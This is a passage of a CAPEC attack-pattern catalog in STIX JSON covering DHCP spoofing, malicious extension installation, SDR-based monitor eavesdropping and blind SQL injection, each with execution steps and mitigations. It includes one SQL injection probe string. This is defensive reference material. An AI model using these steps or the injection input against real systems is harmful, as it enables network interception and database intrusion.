Spoofing", + "external_id": "T1557.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/003" + }, + { + "description": "Yuval Lazar, DHCP Spoofing 101, 2021--11---03, Pentera", + "external_id": "REF-737", + "source_name": "reference_from_CAPEC", + "url": " https://pentera.io/blog/dhcp-spoofing-101" + }, + { + 
"description": "T. Melsen, S. Blake, Ericsson, DHCP Spoofing 101, 2006--06, The Internet Society", + "external_id": "REF-738", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc4562.html" + }, + { + "description": "Bosco Sebastian, DHCP Spoofing 101, 2019--08---02, McAfee", + "external_id": "REF-739", + "source_name": "reference_from_CAPEC", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhcp-client-remote-code-execution-vulnerability-demystified/" + } + ], + "id": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DHCP Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Execute Unauthorized Commands" + ], + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In early 2019, Microsoft patched a critical vulnerability (CVE-2019-0547) in the Windows DHCP client which allowed remote code execution via crafted DHCP OFFER packets. [REF-739]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Exsisting DHCP lease: An adversary observes network traffic and waits for an existing DHCP lease to expire on a target machine in the LAN.

  2. Techniques
    Adversary observes LAN traffic for DHCP solicitations

Experiment

  1. Capture the DHCP DISCOVER message: The adversary captures \"DISCOVER\" messages and crafts \"OFFER\" responses for the identified target MAC address. The success of this attack centers on the capturing of and responding to these \"DISCOVER\" messages.

  2. Techniques
    Adversary captures and responds to DHCP \"DISCOVER\" messages tailored to the target subnet.

Exploit

  1. Compromise Network Access and Collect Network Activity: An adversary successfully acts as a rogue DHCP server by redirecting legitimate DHCP requests to itself.

  2. Techniques
    Adversary sends repeated DHCP \"REQUEST\" messages to quickly lease all the addresses within network's DHCP pool and forcing new DHCP requests to be handled by the rogue DHCP server.
", + "x_capec_extended_description": "\n DHCP is broadcast to the entire Local Area Network (LAN) and does not have any form of authentication by default. Therefore, it is susceptible to spoofing.\n An adversary with access to the target LAN can receive DHCP messages; obtaining the topology information required to potentially manipulate other hosts' network configurations.\n To improve the likelihood of the DHCP request being serviced by the Rogue server, an adversary can first starve the DHCP pool.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have access to a machine within the target LAN which can send DHCP offers to the target." + ], + "x_capec_resources_required": [ + "The adversary requires access to a machine within the target LAN on a network which does not secure its DHCP traffic through MAC-Forced Forwarding, port security, etc." + ], + "x_capec_skills_required": { + "Medium": "The adversary must identify potential targets for DHCP Spoofing and craft network configurations to obtain the desired results." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: MAC-Forced Forwarding", + "id": "course-of-action--98de0edc-dd38-44d1-9f6f-0ceaa61fa7d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d5c73ef-a153-438a-8052-fb0d415d37f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98de0edc-dd38-44d1-9f6f-0ceaa61fa7d0", + "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Port Security and DHCP snooping", + "id": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87cf77e-7197-4f15-a744-bbd9840ea6d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65", 
+ "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Network-based Intrusion Detection Systems", + "id": "course-of-action--cab0ed33-e641-416d-9959-6197f786a075", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d86362d1-fe04-4931-a0e3-56adbd075ab6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab0ed33-e641-416d-9959-6197f786a075", + "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.\n ", + "external_references": [ + { + "external_id": "CAPEC-698", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/698.html" + }, + { + "external_id": "CWE-507", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/507.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Browser Extensions", + "external_id": "T1176", + "source_name": "ATTACK", + "url": 
"https://attack.mitre.org/wiki/Technique/T1176" + }, + { + "description": "Server Software Component: IIS Components", + "external_id": "T1505.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/004" + }, + { + "description": "Robert Falcone, OilRig uses RGDoor IIS Backdoor on Targets in the Middle East, 2018--01---25, Palo Alto Networks", + "external_id": "REF-740", + "source_name": "reference_from_CAPEC", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + }, + { + "description": "ASERT Team, STOLEN PENCIL Campaign Targets Academia, 2018--12---05, NETSCOUT", + "external_id": "REF-741", + "source_name": "reference_from_CAPEC", + "url": "https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia" + } + ], + "id": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install Malicious Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In January 2018, Palo Alto's Unit 42 reported that a malicious Internet Information Services (IIS) extension they named RGDoor was used to create a backdoor into several Middle Eastern government organizations, as well as a financial institution and an educational institution. 
This malware was used in conjunction with the TwoFace webshell and allowed the adversaries to upload/download files and execute unauthorized commands. [REF-740]\n ", + "\n In December 2018, it was reported that North Korea-based APT Kimusky (also known as Velvet Chollima) infected numerous legitimate academic organizations within the U.S., many specializing in biomedical engineering, with a malicious Google Chrome extension. Dubbed \"Operation STOLEN PENCIL\", the attack entailed conducting spear-phishing attacks to trick victims into installing a malicious PDF reader named \"Auto Font Manager\". Once installed, the malware allowed adversaries to steal cookies and site passwords, as well as forward emails from some compromised accounts. [REF-741]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target(s): The adversary must first identify target software that allows for extensions/plugins and which they wish to exploit, such as a web browser or desktop application. To increase the attack space, this will often be popular software with a large user-base.

Experiment

  1. Create malicious extension: Having identified a suitable target, the adversary crafts a malicious extension/plugin that can be installed by the underlying target software. This malware may be targeted to execute on specific operating systems or be operating system agnostic.

Exploit

  1. Install malicious extension: The malicious extension/plugin is installed by the underlying target software and executes the adversary-created malware, resulting in a variety of negative technical impacts.

  2. Techniques
    Adversary-Installed: Having already compromised the target system, the adversary simply installs the malicious extension/plugin themself.
    User-Installed: The adversary tricks the user into installing the malicious extension/plugin, via means such as social engineering, or may upload the malware on a reputable extension/plugin hosting site and wait for unknowing victims to install the malicious component.
", + "x_capec_extended_description": "\n Many software applications allow users to install third-party software extensions/plugins that provide additional features and functionality. Adversaries can take advantage of this behavior to install malware on a system with relative ease. This may require the adversary compromising a system and then installing the malicious extension themself. An alternate approach entails masquerading the malicious extension as a legitimate extension. The adversary then convinces users to install the malicious component, via means such as social engineering, or simply waits for victims to unknowingly install the malware on their systems. Once the malicious extension has been installed, the adversary can achieve a variety of negative technical impacts such as obtaining sensitive information, executing unauthorized commands, observing/modifying network traffic, and more.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must craft malware based on the type of software and system(s) they intend to exploit.", + "If the adversary intends to install the malicious extension themself, they must first compromise the target machine via some other means." + ], + "x_capec_skills_required": { + "Medium": "Optional: Ability to exploit target system(s) via other means in order to gain entry." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only install extensions/plugins from official/verifiable sources.", + "id": "course-of-action--aacf7ddd-d5f7-405b-a08c-c17e40ddea15", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0b5c230-fac9-4388-84ba-79f82c3f54f8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aacf7ddd-d5f7-405b-a08c-c17e40ddea15", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm extensions/plugins are legitimate and not malware masquerading as a legitimate extension/plugin.", + "id": "course-of-action--26c55e54-7980-4381-9787-85f4fc056efb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8732c1a9-2c30-4a0f-a85e-eba86afae50e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--26c55e54-7980-4381-9787-85f4fc056efb", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the underlying software leveraging the extension/plugin (including operating systems) is up-to-date.", + "id": "course-of-action--ea4f7fab-a15b-416d-8728-60b9eed0505f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9174facf-ad92-4cd1-a458-5bfefa5756d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea4f7fab-a15b-416d-8728-60b9eed0505f", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an extension/plugin allow list, based on the given security policy.", + "id": "course-of-action--eba8ec2c-d600-423e-a463-27584e2ab7ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0fe03f4-b8ab-475f-b1bb-568643d808fd", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eba8ec2c-d600-423e-a463-27584e2ab7ab", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.", + "id": "course-of-action--1b8f20d5-595c-4723-84eb-403cf9dad6b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--211d3a26-d73e-4aba-87e1-527adbc75e74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b8f20d5-595c-4723-84eb-403cf9dad6b5", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": "course-of-action--37d2bc08-4639-4476-a9a2-771ef9e71e30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--53622b2d-230c-42f4-bd8c-86e0d7048aa8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37d2bc08-4639-4476-a9a2-771ef9e71e30", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "modified": "2023-01-24T00:00:00.000Z", + 
"name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

  2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

  2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + 
"x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enhance: Increase the number of electromagnetic shield layers in the display ports and cables to contain or reduce the intensity of the leaked signal.", + "id": "course-of-action--4c0077be-4137-4ecd-af5b-833fe09c74f0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a414f123-2b57-4f79-86c4-43cb1640b898", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c0077be-4137-4ecd-af5b-833fe09c74f0", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use a protocol that encrypts the video signal; in case the signal is intercepted the signal is protected by the encryption.", + "id": "course-of-action--99ccf3d5-4c15-4adb-9806-07bac3ee35cf", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e639e3d-9aeb-4937-b1b2-af26990dfbb7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99ccf3d5-4c15-4adb-9806-07bac3ee35cf", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Lock away the video cables, making it difficult for the attacker to access the cables and place the antenna near them (If the distance condition between the antenna and display port/cable is not satisfied, the attack will not be possible).", + "id": "course-of-action--e78b24cb-16be-4fd1-ab9c-ed10647686ef", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef557ac3-a5f5-494e-8b0f-57eca9a0d5f7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e78b24cb-16be-4fd1-ab9c-ed10647686ef", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--e9dfadfb-5d7f-42f4-863c-050ca2c032a3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8d907a7-bede-4731-9dcd-7930220cf37b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9dfadfb-5d7f-42f4-863c-050ca2c032a3", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. 
Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", + "external_references": [ + { + "external_id": "CAPEC-7", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/7.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Blind SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_SQL_Injection" + } + ], + "id": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Blind SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary may try entering something like \"username' AND 1=1; --\" in an input field. 
